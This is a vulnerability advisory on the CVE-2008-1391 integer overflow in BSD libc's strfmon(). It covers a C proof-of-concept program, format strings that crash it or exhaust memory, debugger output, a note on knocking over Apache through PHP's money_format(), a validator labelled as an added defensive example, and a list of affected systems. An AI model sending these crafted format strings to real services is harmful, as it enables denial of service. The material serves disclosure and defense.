SSV:3103
Integer overflow vulnerability in the 'strfmon()' function on multiple BSD platforms

2008-03-29 00:00:00
Root
www.seebug.org

EPSS: 0.022 (Low), percentile 88.3%

BUGTRAQ ID: 28479
CVE ID:CVE-2008-1391
CNCVE ID:CNCVE-20081391

The 'strfmon()' function on multiple BSD platforms contains an integer overflow in its processing. It may allow arbitrary code execution in the context of the affected application; a failed attempt can cause a denial of service.
The affected function has the following prototype:

    #include <monetary.h>

    ssize_t
    strfmon(char * restrict s, size_t maxsize, const char * restrict format, ...);

1. /usr/src/lib/libc/stdlib/strfmon.c - integer overflow
The main problem lies in the strfmon() function itself and is triggered when the function is used as follows:

--- example-start ---
    #include <stdio.h>
    #include <monetary.h>

    int main(int argc, char *argv[])
    {
        char buff[51];
        char *bux = buff;
        ssize_t res;

        if (argc < 2)
            return 1;
        /* argv[1] is passed straight through as the format string; the width
         * and precision fields it carries are what overflow inside strfmon().
         * 0.0 is the double value consumed by the conversion. */
        res = strfmon(bux, 50, argv[1], 0.0);
        printf("%zd\n", res);
        return 0;
    }
--- example-end ---

Compile it, then supply a format string such as the following:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
The problem looks like this:
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %99999999999999999999n
Starting program: /cxib/C/pln %99999999999999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814e0e6 in memmove () from /lib/libc.so.7
(gdb)
memmove() is reallocating memory.
cxib# gdb -q pln
(no debugging symbols found)…(gdb) r %.9999999999n
Starting program: /cxib/C/pln %.9999999999n
(no debugging symbols found)…(no debugging symbols found)…
Program received signal SIGSEGV, Segmentation fault.
0x2814f093 in abort () from /lib/libc.so.7
The next example:
cxib# ./pln %#99999999999999999999n
Long execution time. Let's check on this process:


cxib# ps -aux | grep pln
cxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68
./pln %#99999999999999999999n
cxib# ps -aux | grep pln
cxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07
./pln %#99999999999999999999n
1 VSZ=140320
2 VSZ=482336


pln keeps allocating more memory. PHP uses strfmon() in its money_format() function, so when mod_php5 is used under Apache we can build an exploit along the same lines; the result is:

--- apache-child-die ---
swap_pager: out of swap space
swap_pager_getswapspace(16): failed
Mar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space
--- apache-child-die ---
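As an added example (not code from the original advisory, from any BSD libc, or from PHP), a defender-side check that rejects strfmon() format strings whose field width or precision exceeds a caller-chosen bound before the string ever reaches libc. This is the kind of validation an application that lets user input reach money_format()-style formatting needs; the function names and the bound are assumptions.

```c
#include <stddef.h>
#include <string.h>

/* Read a decimal run at p, refusing any value above limit, so a 20-digit
 * width can never wrap. Returns chars consumed, or -1 when too large. */
static int parse_bounded(const char *p, size_t limit, size_t *out)
{
    size_t v = 0;
    int n = 0;
    while (p[n] >= '0' && p[n] <= '9') {
        size_t d = (size_t)(p[n] - '0');
        if (d > limit || v > (limit - d) / 10)  /* v*10+d would exceed limit */
            return -1;
        v = v * 10 + d;
        n++;
    }
    *out = v;
    return n;
}
/* Return 1 when every conversion in fmt is well-formed and keeps its field
 * width (w), left precision (#n) and right precision (.p) at or below
 * max_width, else 0. Grammar is POSIX strfmon():
 *   %[=f][^][+|(][!][-][w][#n][.p](i|n), plus %% for a literal percent. */
int strfmon_format_is_safe(const char *p, size_t max_width)
{
    size_t v;
    int n;
    while (*p) {
        if (*p++ != '%') continue;
        if (*p == '%') { p++; continue; }
        for (;;) {                                  /* optional flags */
            if (*p == '=') { if (!p[1]) return 0; p += 2; }
            else if (*p && strchr("^+(!-", *p)) p++;
            else break;
        }
        if ((n = parse_bounded(p, max_width, &v)) < 0) return 0;   /* w */
        p += n;
        if (*p == '#') {                                            /* #n */
            if ((n = parse_bounded(p + 1, max_width, &v)) < 0) return 0;
            p += 1 + n;
        }
        if (*p == '.') {                                            /* .p */
            if ((n = parse_bounded(p + 1, max_width, &v)) < 0) return 0;
            p += 1 + n;
        }
        if (*p != 'i' && *p != 'n') return 0;  /* unknown/missing conversion */
        p++;
    }
    return 1;
}
```

The three format strings from the advisory are all rejected with a bound of 50 (the PoC's buffer size), while ordinary formats with flags, fill characters and small precisions pass.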

Affected systems:
NetBSD 4.0
FreeBSD 6.0.x
FreeBSD 6.0-STABLE
FreeBSD 6.0-RELEASE
FreeBSD 7.0 BETA4
FreeBSD 7.0-RELENG
FreeBSD 7.0-PRERELEASE
FreeBSD 7.0
FreeBSD 6.0-RELEASE-p5
Contact the vendor for patch information:
http://www.netbsd.org/